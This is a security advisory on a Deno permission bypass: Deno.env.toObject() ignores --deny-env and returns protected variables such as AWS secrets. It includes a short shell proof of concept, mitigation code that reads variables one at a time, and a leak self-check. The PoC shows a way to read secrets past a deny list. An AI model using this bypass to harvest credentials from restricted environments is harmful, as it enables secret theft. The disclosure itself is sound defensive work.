8.1
Deno's Deny-Env Option Ignored by toObject Method
JLSEC-2026-110
Summary
Deno's `--deny-env` option is bypassed by `Deno.env.toObject()`: environment variables listed in `--deny-env` can still be read through this method. If you use Deno and rely on `--deny-env` to restrict access to sensitive environment variables, avoid `toObject` and use the `get` method to access individual variables instead. Update your code to use `get` rather than `toObject` so that the intended security restrictions still apply.
What to do
- Update deno_jll to version 2.6.3+0.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | deno_jll | <= 2.6.3+0 | 2.6.3+0 |
Original title
Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables
Original description
### Summary
The [Deno.env.toObject](https://docs.deno.com/api/deno/%7E/Deno.Env.toObject) method ignores any variables listed in the `--deny-env` option of the `deno run` command. When looking at the [documentation](https://docs.deno.com/runtime/fundamentals/security/#environment-variables) of the `--deny-env` option this might lead to a false impression that variables listed in the option are impossible to read.
### PoC
```
export AWS_SECRET_ACCESS_KEY=my-secret-aws-key
# Works as expected. The program stops with a "NotCapable" error message
echo 'console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
# All environment variables are printed and the --deny-env list is completely disregarded
echo 'console.log(Deno.env.toObject());' | deno run \
--allow-env \
--deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -
```
The first example using `get` exits with the following error:
```
error: Uncaught (in promise) NotCapable: Requires env access to "AWS_SECRET_ACCESS_KEY", run again with the --allow-env flag
console.log(Deno.env.get("AWS_SECRET_ACCESS_KEY"));
^
at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)
at file:///$deno$stdin.mts:1:22
```
The second example using `toObject` prints all environment variables:
```
[Object: null prototype] {
...
AWS_SECRET_ACCESS_KEY: "my-secret-aws-key",
...
}
```
### Impact
Software relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.
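The mitigation from the summary (read individual variables with `get` rather than `toObject`), as an added example that is not code from the Deno project or from this advisory. The function names are hypothetical and `makeFakeEnv` is a constructed stand-in for `Deno.env`; in a Deno program pass `Deno.env` itself.

```javascript
// Added example, not Deno project code. `env` is anything shaped like Deno.env.

// Read only the variables the program needs, one get() call per name.
function readAllowedEnv(env, names) {
  const values = {};
  const denied = [];
  for (const name of names) {
    try {
      const value = env.get(name);
      if (value !== undefined) values[name] = value;
    } catch (err) {
      // The PoC output shows a denied get() failing with a NotCapable error.
      if (err && err.name === "NotCapable") denied.push(name);
      else throw err;
    }
  }
  return { values, denied };
}

// Startup self-check: which deny-listed names does toObject() still expose?
function findDenyListLeaks(env, denyList) {
  let all;
  try {
    all = env.toObject();
  } catch (err) {
    if (err && err.name === "NotCapable") return []; // refused outright: nothing leaked
    throw err;
  }
  return denyList.filter((n) => Object.prototype.hasOwnProperty.call(all, n));
}

// Constructed stand-in for Deno.env so the example runs without Deno.
// affected=true models the behaviour in the PoC: toObject() skips the deny list.
function makeFakeEnv(vars, denyList, affected) {
  const deny = new Set(denyList);
  return {
    get(name) {
      if (deny.has(name)) {
        const err = new Error(`Requires env access to "${name}"`);
        err.name = "NotCapable";
        throw err;
      }
      return vars[name];
    },
    toObject() {
      const visible = Object.entries(vars).filter(([k]) => affected || !deny.has(k));
      return Object.fromEntries(visible);
    },
  };
}
```

A non-empty result from `findDenyListLeaks(Deno.env, [...])` at startup means the running version does not apply the deny list to `toObject`.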
CVSS 4.0 (osv): 8.1
- https://docs.deno.com/api/deno/~/Deno.Env.toObject
- https://docs.deno.com/runtime/fundamentals/security/#environment-variables
- https://github.com/denoland/deno/commit/2959e083912420988066a001c2b2d6732a1b562f
- https://github.com/denoland/deno/commit/946ccda1aa19a00c478a5e6826b75053b050d753
- https://github.com/denoland/deno/pull/29079
- https://github.com/denoland/deno/security/advisories/GHSA-7w8p-chxq-2789
- https://nvd.nist.gov/vuln/detail/CVE-2025-48934
- https://github.com/advisories/GHSA-7w8p-chxq-2789
Published: 14 Apr 2026 · Updated: 14 Apr 2026 · First seen: 14 Apr 2026